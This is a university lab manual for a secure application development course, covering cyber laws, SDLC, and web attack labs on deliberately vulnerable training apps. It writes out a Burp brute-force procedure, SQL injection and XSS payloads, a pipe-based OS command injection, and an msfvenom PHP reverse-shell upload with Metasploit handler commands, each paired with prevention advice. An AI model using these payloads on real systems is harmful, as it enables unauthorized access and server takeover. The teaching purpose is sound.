DEPARTMENT OF INFORMATION TECHNOLOGY

Lab Manual

BE-IT Semester VII

ACADEMIC YEAR: 2025 - 2026

Secure Application Development

(ITL 703)
DEPARTMENT OF INFORMATION TECHNOLOGY

Lab Manual

BE-IT Semester VII

ACADEMIC YEAR: 2022 - 2023

Secure Application Development

(ITL 703)

_______________

HOD
Department of IT
 Experiment List

Exp. No. Experiment Name

LO1
1. Study of different laws and standards of cyber security.

LO2
2. Case study for SDLC

LO4
3. Online Password attack.

LO3
4. Use Burp proxy to test Web Application.

LO4
5. SQL Injection vulnerability allows login page to bypass.

LO4
6 Cross-Site Scripting XSS Vulnerability Lab.

LO4
7 OS Command Vulnerability Lab.

LO4
8 Unvalidated file upload vulnerability lab.

LO6
9 Symmetric and Asymmetric.

LO6
10 Symmetric Encryption and Hashing.
Department of Information Technology

Department’s Vision
To develop competent, skilled, self-disciplined, and ethically sound IT engineers with a professional
attitude to match global standards.
Department’s Mission
M1: To employ innovative teaching techniques and provide experiential knowledge to create proficient
and responsible IT professionals.
M2: To provide sufficient research opportunities and acquaint students with recent trends in industry.
M3: To enhance creativity and entrepreneurial approach to contribute positively to society with lifelong
learning and commitment to professional ethics.
Program Educational Objectives (PEO’s)
PEO1: To expose students to a strong foundation in the field of Information Technology for creating
proficient and responsible IT Professionals.
PEO2: To prepare competent IT Engineers as per global career requirements with the ability to engage
in life-long learning.
PEO3: To equip students to gain proficiency in recognizing and understanding the social, cultural, ethical,
global, and environmental responsibilities of a professional engineer and the need for sustainable
development.
PEO4: To encourage students to develop life skills and gain interest in research, entrepreneurship, and
higher studies in the field of Information Technology.
Program Specific Outcomes (PSO’s)
PSO1: Students will be able to apply the knowledge of Information Technology to Define, Analyze,
Design, Test, and Integrate subsystems to provide domain-specific IT solutions for real-world problems.
PSO2: Students will be able to apply innovative tools and techniques in the field of Information Security,
Data Analytics, Artificial Intelligence, Cloud Computing, and Information Retrieval.
 Program Outcomes (PO’s)
PO1: Engineering knowledge: Apply the knowledge of mathematics, science, engineering fundamentals,
and an engineering specialization to the solution of complex engineering problems.
PO2: Problem analysis: Identify, review research literature, and analyze complex engineering problems
reaching substantiated conclusions using first principles of mathematics, and engineering sciences.
PO3: Design/development of solutions: Design solutions for complex engineering problems and design
system components or processes that meet the specified needs with appropriate consideration for
public health and safety, and the cultural, societal, and environmental considerations.
PO4: Conduct investigations of complex problems: Use research-based knowledge and research
methods including design of experiments, analysis, and interpretation of data, and synthesis of the
information to provide valid conclusions.
PO5: Modern tool usage: Create, select, and apply appropriate techniques, resources, and modern
engineering and IT tools including prediction and modeling to complex engineering activities with an
understanding of the limitations.
PO6: The engineer and society: Apply reasoning informed by the contextual knowledge to assess
societal, health, safety, legal and cultural issues, and the consequent responsibilities relevant to the
professional engineering practice.
PO7: Environment and sustainability: Understand the impact of the professional engineering solutions
in societal and environmental contexts, and demonstrate the knowledge of, and need for sustainable
development.
PO8: Ethics: Apply ethical principles and commit to professional ethics and responsibilities and norms of
the engineering practice.
PO9: Individual and teamwork: Function effectively as an individual, and as a member or leader in
diverse teams, and in multidisciplinary settings.
PO10: Communication: Communicate effectively on complex engineering activities with the engineering
community and with society at large, such as being able to comprehend and write effective reports and
design documentation, make effective presentations, and give and receive clear instructions.
PO11: Project management and finance: Demonstrate knowledge and understanding of the engineering
and management principles and apply these to one’s own work, as a member and leader in a team, to
manage projects and in multidisciplinary environments.
PO12: Life-long learning: Recognize the need for and have the preparation and ability to engage in
independent and life-long learning in the broadest context of technological change.
 Teaching Scheme Credits Assigned
(Contact Hours)

Course Code Course Name Theory Practica Tutorial Theory Practi Tutorial Tota
l cal & l
Oral

ITL703 Secure -- 2 -- -- 1 -- 01
Application
Development

Course Course Name Examination Scheme

Code

Theory Marks Term Practical/ Total

Work Oral
Internal assessment End
Sem.
Test1 Test Avg. Exam
2 of 2
Tests

ITL703 Secure -- -- -- -- 25 25 50
Application
Development

Lab Objectives:
Sr. No Lab Objectives

The Lab experiments aims:

1 To understand the secure programming of application code.

2 To understand the Owasp methodologies and standards.

3 Understand and Identify main vulnerabilities inherent in applications.

4 Understand how Data Validation and Authentication can be applied for application.

5 Understand how to apply Security at Session Layer Management.

6 Understand how to apply to secure coding for cryptography.

∙
 Lab Outcomes:
Sr. Lab Outcomes Cognitive levels
No of attainment as
per Bloom’s
Taxonomy

On successful completion, of course, learner/student will be able to:

1 Apply secure programming of application code. L1,L2,L3

2 Understand the Owasp methodologies and standards. L1,L2,L3

3 Identify main vulnerabilities inherent in applications. L1,L2,L3

4 Apply Data Validation and Authentication for application L1,L2,L3,L4,L5

5 Apply Security at Session Layer Management L1,L2,L3,L4,L5

6 Apply secure coding for cryptography. L1,L2,L3,L4,L5

Hardware & Software requirements:

Hardware Specifications Software Specifications

PC with following Configuration Web Application, HTML5, CSS3, Java, C, Python,

1. Intel Core i3/i5/i7 MySQL or Database Software.
2. 4 GB RAM Internet Connection, Browser, Security tools. SAST
3. 500 GB Hard disk tools etc.

Prerequisite: Knowledge of programming languages like java/python/C is required.

DETAILED SYLLABUS:
Sr. Module Detailed Content Hours LO
No. Mapping

0 Prerequisite Programming Language and Web application basic 02

concepts.

I Introduction to Introduction to laws, standards and guidelines of 04 LO1

Secure cyber security. What do you mean by attacks, types
Programming of attacks and statistics of main vulnerabilities?

Lab1: Study of different laws and standards of cyber

security.
II Methodologies Software Development Lifecycle. Risk Analysis. 06 LO2
for developing Threat Modeling. Study different SAST (Static
secure code Application Security Testing) tools. Study different
top 10 methodologies and guidelines of OWASP
(Open Web Application Security Project) for the
secure application development. Any top 5 OAT. Best
eight guidelines for Secure Coding. Understand the
flow of Verification testing for secure coding.

Lab2: Case study for SDLC.

Lab3: Exercise on Threat Modeling.
Lab4: Study of SAST Tools (open Source like GitHub,
GitLab and so on) and use at least one for practical
Lab5: Study and implement at least any 5
methodologies of OWASP.
Lab6: Study and implement at least any 5 OAT Denial
of Inventory for E-commerce Website..

III VAPT of Introduction to the HTTP protocol. Owasp Web 04 LO3

Applications Security Testing Guidelines. Tools for VAPT testing.

Lab7: Use Burp proxy to test web applications.

IV Data Validation Guidelines for input data validation (Data type, 05 LO4
& Data size, Data range, Data Content etc.) and
Authentication authentication for login page. Types of
Authentication attacks. Study different type of
vulnerabilities like SQL Injection vulnerability,
LDAP and XPath Injection vulnerabilities, Cross Site
Scripting (XSS) vulnerability, OS Command,
LFI/RFI, Unvalidated file upload and buffer
overflow etc.

Lab8: Registration Page Data Validation.

Lab9: SQL injection vulnerability allows login page
to bypass.
Lab10: LDAP and XPath Injection vulnerabilities for
login /registration page.
Lab11: Cross-Site Scripting (XSS) vulnerability Lab
Lab12: OS Command vulnerability Lab
Lab13: LFI/RFI or Unvalidated file upload or Buffer
Overflow vulnerability Lab.
Lab14: Online Password attack
 V Security in Introduction to Session Layer in Web Applications 03 LO5
Session Layer and management. Session Management Best
practices according to OWASP.

Lab15: Session Management for Web Application.

VI Secure Coding Overview of cryptography and guidelines for using 02 LO6

for encryption. Types of cryptography ie symmetric and
cryptography. asymmetric. Hashing Algorithms etc.

Lab16: Symmetric and Asymmetric

Lab17: Symmetric Encryption and Hashing.

Text & References Books:

1. Fundamental Practice for Secure Software Development.

2. The OWASP Automated Threat Handbook - Web Applications.
3. OWASP Alpha Release Code Review Guide 2.0
4. Secure Programming HOWTO
5. OWASP Quick reference guide 2.

Online References:
Sr. No. Website Links

1 https://www.udemy.com/course/secure-coding-secure-application-development/

2 https://kirkpatrickprice.com/blog/secure-coding-best-practices/

3 https://owasp.org/www-project-automated-threats-to-web-
applications/assets/oats/EN/OAT 021_Denial_of_Inventory

Term Work:

Term Work shall consist of at least 10 to 12 practical based on the above list. Also Term Work Journal must
include at least 2 assignments as mentioned in above syllabus.

Term Work Marks: 25 Marks (Total marks) = 15 Marks (Experiments) + 5 Marks (Assignment) + 5 Marks

(Attendance) Oral Exam: An Oral exam will be held based on the above syllabus.
Guidelines to Students:

1. Equipment in the lab for the use of student community. Students need to maintain a proper
decorum in the lab. Students must use the equipment with care. Any damage caused is
punishable.
2. Students are required to carry their completed experiment file while entering the lab.
3. Students are supposed to occupy the machines allotted to them and are not supposed to talk or
make noise in the lab.
4. Lab can be used in free time / lunch hours by the students who need to use the systems should
take prior permission from the lab in-charge.

Do’s and Don’ts in the Lab: Do’s:-

1. Proper uniform has to be maintained while entering in the Lab. (Boys Tuck-in and girls should be
neatly dressed)

2. Students should carry observation notes and record completed in all aspects.

3. Student should be aware of the next experiment before coming to the lab.

4. Students should be at their concerned table, unnecessary movement is to be restricted.

5. Student should follow the procedure to start implementing the experiment with the permission
of faculty-incharge / lab assistant. They need to switch on their respective systems and after
completing the same they need to switch it off and keep the chairs in order.

6. The Practical Result should be noted down into their lab-book and result must be shown to the
faculty-incharge for verification.

7. Students must ensure that all switches are in the OFF position; all the systems are shut down
properly before leaving the lab.

Don’ts:-

1. Don’t come late to the Lab.

2. Don’t leave the Lab without shutting down all the systems and keeping the chairs in order.
3. Don’t leave the Lab without verification by faculty-incharge / lab assistant.
4. Don’t leave the lab without the permission of the faculty In-Charge.
 Experiment no 1

Aim - Study of different laws and standards of cyber security.

Learning Objective - Gain a comprehensive understanding of various cybersecurity laws and standards
to ensure effective protection of digital assets and data.

Course Objectives -

Theory :

Different Laws of Cyber security

● Information Technology (IT) Act, 2000: Purpose: Addresses various cybercrimes and provides
legal provisions for electronic transactions and data protection.

● Personal Data Protection Bill (Draft): Purpose: Aims to regulate the collection, processing, and
storage of personal data and protect individuals' privacy rights.

● Reserve Bank of India (RBI) Guidelines on Cyber Security: Purpose: Sets cybersecurity standards
for banks and financial institutions to safeguard customer data and financial systems.

● National Cyber Security Policy (NCSP): Purpose: Outlines India's strategic approach to strengthen
its cybersecurity posture and protect critical information infrastructure.

● Indian Computer Emergency Response Team (CERT-In): Purpose: Serves as the national agency
for responding to cybersecurity incidents and promoting cybersecurity awareness.

● COPPA - U.S. online privacy protection for children under 13.

Standards of Cyber security

● ISO/IEC 27001: Information Security Management System framework.

● ISO/IEC 27002: Guidelines for information security controls.

● NIST Cybersecurity Framework: Guidelines for risk management.

● PCI DSS: Standards for cardholder data protection.

● CIS Controls: Prioritized cybersecurity actions.

● IEC 62443: Security guidelines for industrial systems.

Learning Outcome :
Conclusion:
 Experiment no 2

Aim - Case Study for SDLC

Learning Objective - Understand the SDLC process and its application in redesigning and implementing
a successful e-commerce platform.

Course Objectives - Develop a practical understanding of SDLC principles and best practices through a
real-world case study on redesigning and implementing an e-commerce platform.

Introduction: This case study focuses on the Software Development Life Cycle (SDLC) for the redesign
and implementation of an online retail platform, "ShopX," to enhance user experience, improve
performance, and increase sales. The project was undertaken by a leading e-commerce company, "E-
Commerce Co.," aiming to revamp their existing platform to meet the evolving demands of customers
and to stay ahead in a highly competitive market.

● Project Initiation: The project began with a thorough analysis of the existing e-commerce
platform, considering performance, user feedback, and market trends. Key stakeholders,
including the project manager, business analysts, technical architects, and department
representatives, defined the project's scope, objectives, and budget.

● Planning and Requirement Gathering: The planning phase involved setting milestones, allocating
resources, and creating user stories, use cases, and functional specifications. Critical features
were prioritized based on business value and complexity.

● Design and Architecture: Technical architects and UI/UX designers collaborated to create a
scalable, reliable, and secure platform architecture. Mockups and wireframes were used to
gather feedback.

● Development and Implementation: Following Agile methodologies, the development team

coded new features and functionalities. Continuous integration and automated testing ensured
code quality and early bug detection. The platform was deployed on a staging server for further
testing.

● Testing and Quality Assurance: Multiple rounds of testing, including functional, performance,
security, and user acceptance testing, were conducted. The QA team worked closely with
developers to address issues and ensure compliance with requirements.

● Deployment and Release: After obtaining stakeholder approval, the platform was deployed to
production with minimal downtime. The team monitored performance and responded promptly
to any issues.

● Maintenance and Support: Post-launch, the platform entered the maintenance phase. The team
addressed user feedback, implemented updates, and provided support to handle user inquiries
and technical issues.
Conclusion: The successful implementation of the new online retail platform, "ShopX," through a well-
structured Software Development Life Cycle (SDLC) process led to improved user experience and
increased sales. The collaboration of cross-functional teams, adherence to best practices, and focus on
quality throughout the project were key factors in its success. The enhanced features and performance
helped the company maintain its competitive edge and achieve its business objectives.
 Experiment 3

Aim - Online Password attack.

Learning Objective -

Theory:

What is an Online Password Attack?

An online password attack is a cyberattack where an attacker attempts to gain unauthorized access to a
user's account by guessing or cracking their password. These attacks are typically carried out by using
automated tools that can rapidly try different combinations of usernames and passwords until they find
a match.

There are two main types of online password attacks:

1. Brute Force Attacks: These attacks involve trying every possible combination of characters until
the correct password is found. This method is time-consuming and computationally expensive,
but it can be successful if the password is weak or short.

2. Dictionary Attacks: These attacks use a pre-defined list of common passwords or variations of
those passwords to try and guess the correct one. This method is faster than brute force attacks,
but it is only successful if the user's password is on the list.

How to Protect Yourself from these types of Attacks?

1. Strong Passwords: Use long, complex passwords with a mix of characters.

2. Unique Passwords: Avoid reusing passwords across different accounts.

3. Password Manager: Employ a password manager to securely store and manage passwords.

4. Two-Factor Authentication (2FA): Enable 2FA for an extra layer of security.

5. Cautious Clicking: Avoid clicking on suspicious links or attachments in emails or messages.

6. Software Updates: Keep software and operating systems up to date.

7. Social Engineering Awareness: Be wary of social engineering tactics aimed at tricking you into
revealing personal information.

Learning Outcome :

Conclusion:
Demonstration of Online Password Attack.

Download Burp Suite:

Visit the official PortSwigger website to download Burp Suite: Download Burp Suite

You'll have the option to download the free Community Edition or the paid Professional Edition. Choose
the edition that suits your needs.

Choose Your Operating System:

Burp Suite is available for Windows, macOS, and Linux. Select the version that matches your operating
system.

Install Burp Suite:

The installation process may vary depending on your operating system.

● For Windows:

Double-click the downloaded installer (e.g., burpsuite_community_<version>.exe).

Follow the on-screen instructions to install Burp Suite.

● For Linux:

Open a terminal.

Navigate to the directory where the downloaded Burp Suite installer is located. Run the installer
script using a command similar to the following:
sudo sh ./burpsuite_community_linux_v<version>_sh.run

Follow the on-screen instructions to complete the installation.

Launch Burp Suite:

After installation, you can launch Burp Suite from your applications menu or by executing the
appropriate command in your terminal.

For Brute-forcing logins with Burp Suite, we will use DVWA (Damn Vulnerable Web Application).

What is DVWA?
DVWA (Damn Vulnerable Web Application): DVWA is a deliberately vulnerable web application
designed for educational and training purposes in the field of cybersecurity. It contains various common
web application vulnerabilities that users can practice exploiting and securing in a controlled
environment.

1. Open the burp suite and start the browser (Proxy Tab > Open Browser).

2. Access the target using the browser provided by the burp suite; if you observe, the burp suite will
record your traffic in the browser. It means the browser is connected to the software.

3. Fill in the username and password form but don’t press login, here I fill in the username ‘admin’ and
password ‘test’.
4. Back to the browser again, click login, and look at the burp suite; the traffic will be recorded.

5. Right-click on the burp suite, and choose sent to intruder. Go to the intruder tab, and before making
changes to anything, click clear here to remove the “§” sign.
6. All the “§” signs will be gone, and it will become like this.

7. Next, hover on the username and click add to add the “§” sign there.

8. Do the same thing for the password like this. Do it sequentially;

9. Because we are going to brute force in more than one parameter (username and password), choose
the Cluster bomb in attack types.

10. Next, go to the Payloads section, and look at the Payload set below; it will consist of two parameters,
the first username and the second password. It is based on which position you add first.
11. In the Payload set, you have the option to enter the parameters manually or simply click to load the
wordlist file. As previously mentioned, the first parameter represents the username, while the second
represents the password.
12. Everything is done below; the sign your brute force is a success or not is in the length section; if it
shows a different length, it means the attack was a success.
13. Because the length is different, look at the response or try logging in using that account.

We have successfully managed to crack the password using Brute Force Attack.
Experiment 4

Aim - Use Burp proxy to test Web Application.

Learning Objective - Learn how to use Burp Proxy to intercept and analyze HTTP traffic, identify common
web application vulnerabilities, and perform security testing effectively.

Theory:

What is Burp Suite?

Burp Suite, is a popular web application security testing tool. It acts as an intercepting proxy server that
sits between the user's web browser and the target web application. It allows security professionals and
developers to capture, inspect, and modify HTTP/HTTPS requests and responses, making it a valuable
tool for identifying security vulnerabilities and conducting in-depth security assessments of web
applications.

Key Features:

● Proxy: Burp Suite acts as an intercepting proxy, allowing you to capture and modify HTTP
requests and responses between your browser and the web server.

● Scanner: It includes an automated scanner that can identify common web vulnerabilities such as
SQL injection, cross-site scripting (XSS), and more.

● Repeater: This tool allows you to manipulate and resend individual HTTP requests to the server
for testing and analysis.

● Intruder: The Intruder tool is used for automating custom attacks against web applications, such
as brute force or fuzzing attacks.

● Spider: Burp Spider is used to crawl a website and discover its structure and content.

● Sequencer: This tool analyzes the randomness of tokens generated by the application to identify
potential security weaknesses.

● Decoder: It provides various encoding and decoding functions for analyzing and manipulating
data.

Why Burp Suite is Used?

Burp Suite is a widely used and highly regarded tool in the field of cybersecurity and web application
security for several critical reasons:

1. Web Application Vulnerability Assessment:

Burp Suite is primarily used to identify and assess security vulnerabilities in web applications. It helps
security professionals and ethical hackers discover weaknesses that malicious attackers could exploit.
This includes vulnerabilities such as SQL injection, cross-site scripting (XSS), and more.

2. Manual Testing and Analysis:

Security experts use Burp Suite for manual testing and analysis. It allows them to intercept and
manipulate HTTP requests and responses, providing deep insight into how the application behaves and
responds to different inputs.

3. Custom Attacks and Fuzzing:

The Intruder tool in Burp Suite enables testers to automate custom attacks, including brute force,
fuzzing, and more. This helps identify vulnerabilities that may not be detected by automated scanners.

4. Penetration Testing:

Burp Suite is an essential tool in penetration testing engagements. Penetration testers use it to simulate
real-world attacks on web applications and assess an organization's security posture.

5. Comprehensive Reporting:

Burp Suite generates detailed reports that provide a clear overview of identified vulnerabilities, their
severity, and recommended remediation steps. These reports are valuable for communication with
stakeholders and developers.

6. Education and Training:

Burp Suite is also used in cybersecurity education and training programs to teach students and
professionals about web application security concepts, techniques, and tools.

Learning Outcome :

Conclusion:

Demonstration of using Burp proxy to test Web Application.

Download Burp Suite:

Visit the official PortSwigger website to download Burp Suite: Download Burp Suite

You'll have the option to download the free Community Edition or the paid Professional Edition. Choose
the edition that suits your needs.

Choose Your Operating System:

Burp Suite is available for Windows, macOS, and Linux. Select the version that matches your operating
system.

Install Burp Suite:

The installation process may vary depending on your operating system.

● For Windows:

Double-click the downloaded installer (e.g., burpsuite_community_<version>.exe).

Follow the on-screen instructions to install Burp Suite.

● For Linux:

Open a terminal.

Navigate to the directory where the downloaded Burp Suite installer is located. Run the installer
script using a command similar to the following:
sudo sh ./burpsuite_community_linux_v<version>_sh.run

Follow the on-screen instructions to complete the installation.

Launch Burp Suite:

After installation, you can launch Burp Suite from your applications menu or by executing the
appropriate command in your terminal.

For Brute-forcing logins with Burp Suite, we will use DVWA (Damn Vulnerable Web Application).

What is DVWA?

DVWA (Damn Vulnerable Web Application): DVWA is a deliberately vulnerable web application
designed for educational and training purposes in the field of cybersecurity. It contains various common
web application vulnerabilities that users can practice exploiting and securing in a controlled
environment.

1. Open the burp suite and start the browser (Proxy Tab > Open Browser).
 2. Access the target using the browser provided by the burp suite; if you observe, the burp suite will
record your traffic in the browser. It means the browser is connected to the software.

3. Fill in the username and password form but don’t press login, here I fill in the username ‘admin’ and
password ‘test’.
4. Back to the browser again, click login, and look at the burp suite; the traffic will be recorded.

5. Right-click on the burp suite, and choose sent to intruder. Go to the intruder tab, and before making
changes to anything, click clear here to remove the “§” sign.
6. All the “§” signs will be gone, and it will become like this.

7. Next, hover on the username and click add to add the “§” sign there.

8. Do the same thing for the password like this. Do it sequentially;

9. Because we are going to brute force in more than one parameter (username and password), choose
the Cluster bomb in attack types.

10. Next, go to the Payloads section, and look at the Payload set below; it will consist of two parameters,
the first username and the second password. It is based on which position you add first.
11. In the Payload set, you have the option to enter the parameters manually or simply click to load the
wordlist file. As previously mentioned, the first parameter represents the username, while the second
represents the password.
12. Everything is done below; the sign your brute force is a success or not is in the length section; if it
shows a different length, it means the attack was a success.

13. Because the length is different, look at the response or try logging in using that account.
We have successfully managed to crack the password using Brute Force Attack.

Protection Against These Attacks

We can defend against various types of attacks when we employ the right methods. Brute force attacks
involve a form of trial and error and can be quite time and resource-intensive. There are several ways to
prevent such attacks:

1. Enhance web security by adding additional layers, such as tokenization for usernames and
passwords.

2. Implement login limitations, which can deter attackers by limiting the number of login attempts.

3. Apply encoding to input parameters to protect against injection attacks and other malicious
input.
Experiment 5

Aim - SQL Injection vulnerability allows login page to bypass.

Learning Objective -

Theory:

What is SQL injection (SQLi)?

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the queries
that an application makes to its database. This can allow an attacker to view data that they are not
normally able to retrieve. This might include data that belongs to other users, or any other data that the
application can access. In many cases, an attacker can modify or delete this data, causing persistent
changes to the application's content or behavior.

What is the impact of a successful SQL injection attack?

A successful SQL injection attack can result in unauthorized access to sensitive data, such as:

● Passwords.

● Credit card details.

● Personal user information.

SQL injection attacks have been used in many high-profile data breaches over the years. These have
caused reputational damage and regulatory fines. In some cases, an attacker can obtain a persistent
backdoor into an organization's systems, leading to a long-term compromise that can go unnoticed for
an extended period.

How to detect SQL injection vulnerabilities

You can detect SQL injection manually using a systematic set of tests against every entry point in the
application. To do this, you would typically submit:

● The single quote character ' and look for errors or other anomalies.

● Some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a
different value, and look for systematic differences in the application responses.

● Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's
responses.

● Payloads designed to trigger time delays when executed within a SQL query, and look for
differences in the time taken to respond.
SQL injection examples

There are lots of SQL injection vulnerabilities, attacks, and techniques, that occur in different situations.
Some common SQL injection examples include:

● Retrieving hidden data, where you can modify a SQL query to return additional results.

● Subverting application logic, where you can change a query to interfere with the application's
logic.

● UNION attacks, where you can retrieve data from different database tables.

● Blind SQL injection, where the results of a query you control are not returned in the application's
responses.

Learning Outcome :

Conclusion:

Lab: SQL injection vulnerability allowing login bypass

This lab contains a SQL injection vulnerability in the login function.

To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

Head over to the login page.

When we input a username and password, the query string will look like:

SELECT * FROM users WHERE username = 'admin' AND password = 'password'

I input a single quote in the username and login (same with password). Both result in an internal server
error, which shows that it might be vulnerable to SQL injection.
If we input:

administrator'--

SELECT * FROM users WHERE username = 'administrator'--' AND password = 'anythingrandom'

In the above query this time since the 'AND password = ‘anythingrandom’ is commented out, and the
username is ‘administrator’, it will log us into the administrator account.
 Experiment 6

Aim - Cross-Site Scripting XSS Vulnerability Lab.

Learning Objective -

Theory:

What is cross-site scripting (XSS)?

Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable scripts into the
code of a trusted application or website. Attackers often initiate an XSS attack by sending a malicious
link to a user and enticing the user to click it. If the app or website lacks proper data sanitization, the
malicious link executes the attacker’s chosen code on the user’s system. As a result, the attacker can
steal the user’s active session cookie.

How does XSS work?

<script>alert(1)</script>
OR
<script>print(1)</script>

While the payload is usually JavaScript, XSS can take place using any client-side language.

To carry out a cross-site scripting attack, an attacker injects a malicious script into user-provided input.
Attackers can also carry out an attack by modifying a request. If the web app is vulnerable to XSS attacks,
the user-supplied input executes as code. There are many ways to trigger an XSS attack. For example,
the execution could be triggered automatically when the page loads or when a user hovers over specific
elements of the page (e.g., hyperlinks).

Potential consequences of cross-site scripting attacks include:

● Capturing the keystrokes of a user

● Redirecting a user to a malicious website
● Running web browser–based exploits (e.g., crashing the browser)
● Obtaining the cookie information of a user who is logged into a website, thus compromising the
victim’s account

In some cases, the XSS attack leads to a complete compromise of the victim’s account. Attackers can
trick users into entering credentials on a fake form, which provides all the information to the attacker.

Types of XSS attacks?

There are three main types of XSS attacks. These are:

● Reflected XSS, where the malicious script comes from the current HTTP request.
 ● Stored XSS, where the malicious script comes from the website's database.

● DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.

How can you avoid XSS vulnerabilities?

1. Input Validation:
Validate and sanitize user input to block harmful characters.
2. Output Encoding:
Encode output data before rendering it in HTML or JavaScript.
3. Content Security Policy (CSP):
Implement a CSP to control script execution.
4. Keep Software Updated:
Update all components and libraries regularly.
5. Regular Security Audits:
Conduct code reviews and security audits.

Learning Outcome :

Conclusion:

Lab: Reflected XSS into HTML context with nothing encoded

The web application has a search function and prints the search string to the interface.
Checking the HTML source code, we can see that the search string is passed directly in without validation
→ reflected XSS.

Just search for the string

<script>alert(1)</script> # Alert Message will appear.

OR
<script>print(1)</script> # Print dialog box will appear.
At this point we have successfully solved the Reflected XSS Lab.

Lab: Stored XSS into HTML context with nothing encoded

As you can see my comment has been submitted and check the source code and see that the Comment,
Name, Website fields are rendered into HTML. Attackers can completely transmit XSS payload into any
field.

Here, I insert <script>alert(1)</script> into the comment field.

Now reload the page containing the comment, an alert box will appear. we have successfully solved the
Stored XSS Lab.
 Experiment 7

Aim - OS Command Vulnerability Lab.

Learning Objective -

Theory :

What is OS command injection?

OS command injection is also known as shell injection. It allows an attacker to execute operating system
(OS) commands on the server that is running an application, and typically fully compromise the
application and its data. Often, an attacker can leverage an OS command injection vulnerability to
compromise other parts of the hosting infrastructure, and exploit trust relationships to pivot the attack
to other systems within the organization.

How Does a Command Injection Attack Work?

Step 1

During this stage, threat actors locate a vulnerability in an application which allows them to run malicious
operating system commands.

Step 2

The attacker formulates a command designed to trigger the desired action within the host operating
system. Typically, they utilize an input mechanism such as HTML code, cookies, or form fields to inject
this command into the application.

Step 3

The browser interprets the command and it is translated to an operating system command on the host.
Threat actors can then execute specific commands on the host machine and the network of the infected
system.

Learning Outcome :

Conclusion:

Lab: OS command injection

This lab contains an OS command injection vulnerability in the product stock checker.
The application executes a shell command containing user-supplied product and store IDs and returns
the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user.

Viewing the details of a product we get detailed information about that product. Where we can check
the availability of stocks.

Upon using the functionality to check for stocks we can see that we are getting some results. But we are
not getting any changes in parameters. Maybe there is something hidden going on in the request that
we are not aware of. This is where the tool burp suite comes into the picture. Burp suite is a web proxy
tool to analyze requests or modify requests.

As we can see in the above picture when we capture the request to access the functionality of the stock
checker we see a hidden parameter called productId and storeId is being used to fetch information.

It is time to test the OS command injection on the hidden parameter named storeId. We can use a
special character to execute multiple commands at once. As we can in the above picture we use a pipe
character to execute the OS command on the back-end server to test command injection. There are
many other characters like &, | and many more.
Our command runs successfully from the above picture. This means we can execute OS command
injection. We can also test for some other commands like pwd, ls, uname -a or cat /etc/os-release, etc.

How to prevent OS command injection attacks

● Avoid system calls and user input - to prevent threat actors from inserting characters into the
OS command.

● Set up input validation - to prevent attacks like XSS and SQL Injection.

● Create a white list - of possible inputs, to ensure the system accepts only pre-approved inputs.

● Use only secure APIs - when executing system commands such as execFile()

● Stay up-to-date on security patches - Developers should stay up-to-date on the latest security
patches and updates for the systems and software they use. This can help prevent known
vulnerabilities from being exploited.
Experiment 8

Aim - Unvalidated file upload vulnerability lab.

Learning Objective -

Theory :

What are file upload vulnerabilities?

File upload vulnerabilities are when a web server allows users to upload files to its filesystem without
sufficiently validating things like their name, type, contents, or size. Failing to properly enforce
restrictions on these could mean that even a basic image upload function can be used to upload arbitrary
and potentially dangerous files instead. This could even include server-side script files that enable
remote code execution.

What is the impact of file upload vulnerabilities?

The impact of file upload vulnerabilities generally depends on two key factors:

● Which aspect of the file the website fails to validate properly, whether that be its size, type,
contents, and so on.

● What restrictions are imposed on the file once it has been successfully uploaded.

In the worst case scenario, the file's type isn't validated properly, and the server configuration allows
certain types of file (such as .php and .jsp) to be executed as code. In this case, an attacker could
potentially upload a server-side code file that functions as a web shell, effectively granting them full
control over the server.

Learning Outcome :

Conclusion:

Demonstration of File Upload Vulnerability

What is DVWA?

DVWA (Damn Vulnerable Web Application): DVWA is a deliberately vulnerable web application designed
for educational and training purposes in the field of cybersecurity. It contains various common web
application vulnerabilities that users can practice exploiting and securing in a controlled environment.
We will now create a php backdoor using msfvenom

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.124.78 lport=4545 -f raw

Copy and paste the highlighted PHP Payload and save as with PHP extension as File_hack.php on the
desktop.

Come back to your DVWA lab and click to file upload option from vulnerability menu.
Now click to browse button to browse File_hack.php file to upload it on web server and click on upload
which will upload your file in directory of server.
After uploading a PHP file it will show the path of directory where your file is successfully uploaded now
copy the selected part and past it in URL to execute it.

hackable/uploads/File_hack.php

Before executing this URL on browser start and run multi handler in metasploit framework using below
command. While the multi handler will run execute the below URL of PHP file in browser. This’ll provide
you a meterpreter session 1.

localhost/DVWA/hackable/uploads/File_hack.php

msf > use multi/handler

msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.124.78
msf exploit(handler) > set lport 4545
msf exploit(handler) > run
meterpreter > sysinfo
How to prevent file upload vulnerabilities

● Check the file extension against a whitelist of permitted extensions rather than a blacklist of
prohibited ones. It's much easier to guess which extensions you might want to allow than it is to
guess which ones an attacker might try to upload.

● Make sure the filename doesn't contain any substrings that may be interpreted as a directory or
a traversal sequence (../).

● Rename uploaded files to avoid collisions that may cause existing files to be overwritten.

● Do not upload files to the server's permanent filesystem until they have been fully validated.

Learning Outcome :

Conclusion:
 Experiment No 9

Aim - Symmetric and Asymmetric Cryptography.

Learning Objective - Differentiate between symmetric and asymmetric cryptography, and comprehend
their respective strengths and use cases.

Theory :
Symmetric and asymmetric are two fundamental cryptographic techniques used to secure information
and communications. They differ in the way they handle encryption and decryption:

Symmetric Cryptography:

● In symmetric cryptography, the same secret key is used for both encryption and decryption.

● The key must be kept confidential between the parties involved.

● Examples of symmetric algorithms include AES (Advanced Encryption Standard) and DES (Data
Encryption Standard).

Asymmetric Cryptography:

● Asymmetric cryptography uses a pair of keys, a public key, and a private key.

● The public key is openly shared and used for encryption, while the private key is kept secret and
used for decryption.

● It provides a secure way for two parties to communicate without needing a shared secret key.

● Examples of asymmetric algorithms include RSA (Rivest-Shamir-Adleman) and ECC (Elliptic Curve
Cryptography).

Learning Outcome :
Conclusion:

Symmetric -

Code

from Crypto.Cipher import AES

from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import pad, unpad

def generate_key():
